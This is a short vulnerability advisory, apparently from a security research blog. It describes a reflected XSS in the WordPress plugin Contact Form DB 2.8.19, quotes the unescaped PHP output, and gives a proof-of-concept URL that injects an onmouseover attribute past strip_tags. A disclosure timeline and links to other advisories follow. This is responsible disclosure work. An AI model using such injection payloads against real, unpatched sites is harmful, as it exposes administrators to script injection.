13-01-2015 / Vulnerabilities

Contact Form DB 2.8.19 Reflected XSS

Previously found XSS (CVE-2014-7139) was not patched correctly.

File: contact-form-7-to-database-extension\CFDBViewShortCodeBuilder.php

$postedForm = strip_tags(isset($_REQUEST['form']) ? $_REQUEST['form'] : '');
<a target="instructions" href="<?php echo $siteUrl ?>/wp-admin/admin-ajax.php?action=cfdb-export&enc=GLD&form=<?php echo $postedForm ?>"><?php _e('See instructions.'); ?></a>

It's possible to inject specially crafted reflected XSS even if strip_tags and addslashes is used.

Proof of Concept

XSS will be visible for admin.

http://wordpress-url/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&form=" onmouseover=alert(String.fromCharCode(88,83,83)) x="

Timeline

08-12-2014: Discovered
08-12-2014: Vendor notified
09-12-2014: Version 2.8.20 released, issue resolved

Vulnerabilities

Kallithea <= 0.3.4 Incorrect access control and XSS

This vulnerability allows a normal user to modify the permissions of repositories that he normally shouldn’t have access to.

12-12-2018

2 MIN READ

Vulnerabilities

Gitea 1.4.0 Unauthenticated Remote Code Execution

This is part 1 of 3 about bugs inside Gitea

05-07-2018

5 MIN READ

Vulnerabilities

ManageEngine Exchange Reporter Plus Unauthenticated Remote Code Execution

How to create a Metasploit module in example?

28-06-2018

1 MIN READ